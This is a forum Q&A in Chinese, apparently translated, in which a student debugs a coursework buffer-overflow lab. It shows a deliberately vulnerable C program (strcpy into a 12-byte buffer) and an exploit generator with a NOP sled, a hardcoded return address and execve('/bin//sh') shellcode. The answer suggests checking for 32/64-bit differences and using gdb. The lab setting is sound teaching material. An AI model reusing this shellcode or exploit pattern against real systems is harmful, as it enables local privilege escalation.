我正试图完成关于缓冲区溢出攻击的作业,以进入根shell,但每次运行堆栈时,都会出现分段错误我在想是否有人能给我指一个正确的方向我已经
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
这是我编辑的。
/* exploit.c*/
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
long buffer_start = 0xbffff174;
long landing = buffer_start + 250;
long* ptr = (long*)(buffer + 24);
*ptr = landing;
memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
最佳答案
你的问题很令人费解。
不仅不清楚如何编译这些东西,也不清楚它是如何运行的。
所讨论的外壳代码采用32位linux二进制文件此外,在64位linux上运行的32位二进制文件的堆栈位置与在32位系统上运行所述二进制文件的堆栈位置不同这反过来意味着,必须考虑到取代旧地址的返回地址有可能你的学校甚至告诉你要运行一个32位虚拟机之类的。
无论如何,您的第一步应该是检查崩溃,您可以使用gdb(或其他调试器,在类中使用的任何调试器)进行检查,您应该被告知这一点。
这是关于这个主题的经典,用32位的时间写的:http://phrack.org/issues/49/14.html“为了乐趣和利润而粉碎堆栈”